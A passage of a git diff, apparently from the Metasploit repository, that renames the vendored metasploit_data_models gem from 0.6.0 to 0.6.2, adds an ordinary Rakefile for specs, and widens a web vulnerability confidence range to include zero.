rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/.rspec
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.simplecov b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/.simplecov
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.simplecov
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/.simplecov
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.yardopts b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/.yardopts
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.yardopts
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/.yardopts
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/Gemfile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/Gemfile
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/Gemfile
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/Gemfile
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/LICENSE b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/LICENSE
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/LICENSE
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/LICENSE
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/README.md b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/README.md
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/README.md
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/README.md
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/Rakefile
new file mode 100755
index 0000000000..6236c59a57
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/Rakefile
@@ -0,0 +1,53 @@
+#!/usr/bin/env rake
+begin
+ require 'bundler/setup'
+rescue LoadError
+ puts 'You must `gem install bundler` and `bundle install` to run rake tasks'
+end
+
+print_without = false
+APP_RAKEFILE = File.expand_path('../spec/dummy/Rakefile', __FILE__)
+
+begin
+ load 'rails/tasks/engine.rake'
+rescue LoadError
+ puts "railties not in bundle, so can't load engine tasks."
+ print_without = true
+end
+
+Bundler::GemHelper.install_tasks
+
+#
+# load rake files like a normal rails app
+# @see http://viget.com/extend/rails-engine-testing-with-rspec-capybara-and-factorygirl
+#
+
+pathname = Pathname.new(__FILE__)
+root = pathname.parent
+rakefile_glob = root.join('lib', 'tasks', '**', '*.rake').to_path
+
+Dir.glob(rakefile_glob) do |rakefile|
+ load rakefile
+end
+
+begin
+ require 'rspec/core'
+rescue LoadError
+ puts "rspec not in bundle, so can't set up spec tasks. " \
+ "To run specs ensure to install the development and test groups."
+ print_without = true
+else
+ require 'rspec/core/rake_task'
+
+ # Depend on app:db:test:prepare so that test database is recreated just like in a full rails app
+ # @see http://viget.com/extend/rails-engine-testing-with-rspec-capybara-and-factorygirl
+ RSpec::Core::RakeTask.new(:spec => 'app:db:test:prepare')
+
+ task :default => :spec
+end
+
+if print_without
+ puts "Bundle currently installed '--without #{Bundler.settings.without.join(' ')}'."
+ puts "To clear the without option do `bundle install --without ''` (the --without flag with an empty string) or " \
+ "`rm -rf .bundle` to remove the .bundle/config manually and then `bundle install`"
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/api_key.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/api_key.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/api_key.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/api_key.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/client.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/client.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/client.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/client.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/cred.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/cred.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/cred.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/event.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/event.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/event.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/exploit_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/exploit_attempt.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/exploit_attempt.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/exploit_attempt.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/exploited_host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/exploited_host.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/exploited_host.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/exploited_host.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/host.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/host.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/host.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/host_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/host_detail.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/host_detail.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/host_detail.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/host_tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/host_tag.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/host_tag.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/host_tag.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/imported_cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/imported_cred.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/imported_cred.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/imported_cred.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/listener.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/listener.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/listener.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/listener.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/loot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/loot.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/loot.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/loot.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/macro.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/macro.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/macro.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/macro.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/mod_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/mod_ref.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/mod_ref.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/mod_ref.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_action.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_action.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_action.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_action.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_arch.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_arch.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_arch.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_arch.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_author.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_author.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_author.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_author.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_detail.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_detail.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_detail.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_mixin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_mixin.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_mixin.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_mixin.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_platform.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_platform.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_platform.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_platform.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_ref.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_ref.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_ref.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_target.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_target.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_target.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/nexpose_console.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/nexpose_console.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/nexpose_console.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/nexpose_console.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/note.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/note.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/note.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/note.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/profile.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/profile.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/profile.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/profile.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/ref.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/ref.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/ref.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/report.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/report.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/report.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/report.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/report_template.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/report_template.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/report_template.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/report_template.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/route.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/route.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/route.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/route.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/service.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/service.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/service.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/service.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/session.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/session.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/session.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/session.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/session_event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/session_event.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/session_event.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/session_event.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/tag.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/tag.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/tag.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/task.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/task.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/task.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/task.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/user.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/user.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/user.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/user.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/vuln.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/vuln.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/vuln_attempt.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln_attempt.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/vuln_attempt.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/vuln_detail.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln_detail.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/vuln_detail.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/vuln_ref.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln_ref.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/vuln_ref.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_form.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/web_form.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_form.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/web_form.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_page.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/web_page.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_page.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/web_page.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_site.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/web_site.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_site.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/web_site.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/web_vuln.rb similarity index 96% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_vuln.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/web_vuln.rb index 5d9df893c7..fa24eee885 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_vuln.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/web_vuln.rb @@ -15,9 +15,8 @@ class Mdm::WebVuln < ActiveRecord::Base # CONSTANTS # - # A percentage {#confidence} that the vulnerability is real and not a false positive. 0 is not allowed because there - # shouldn't be an {Mdm::WebVuln} record if there is 0% {#confidence} in the the finding. - CONFIDENCE_RANGE = 1 .. 100 + # A percentage {#confidence} that the vulnerability is real and not a false positive. + CONFIDENCE_RANGE = 0 .. 100 # Default value for {#params} DEFAULT_PARAMS = [] 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/wmap_request.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/wmap_request.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/wmap_request.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/wmap_request.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/wmap_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/wmap_target.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/wmap_target.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/wmap_target.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/workspace.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/workspace.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/workspace.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/workspace.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/bin/mdm_console b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/bin/mdm_console
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/bin/mdm_console
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/bin/mdm_console
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/console_db.yml b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/console_db.yml
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/console_db.yml
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/console_db.yml
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/000_create_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/000_create_tables.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/000_create_tables.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/000_create_tables.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/001_add_wmap_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/001_add_wmap_tables.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/001_add_wmap_tables.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/001_add_wmap_tables.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/002_add_workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/002_add_workspaces.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/002_add_workspaces.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/002_add_workspaces.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/003_move_notes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/003_move_notes.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/003_move_notes.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/003_move_notes.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/004_add_events_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/004_add_events_table.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/004_add_events_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/004_add_events_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/005_expand_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/005_expand_info.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/005_expand_info.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/005_expand_info.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/006_add_timestamps.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/006_add_timestamps.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/006_add_timestamps.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/006_add_timestamps.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/007_add_loots.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/007_add_loots.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/007_add_loots.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/007_add_loots.rb
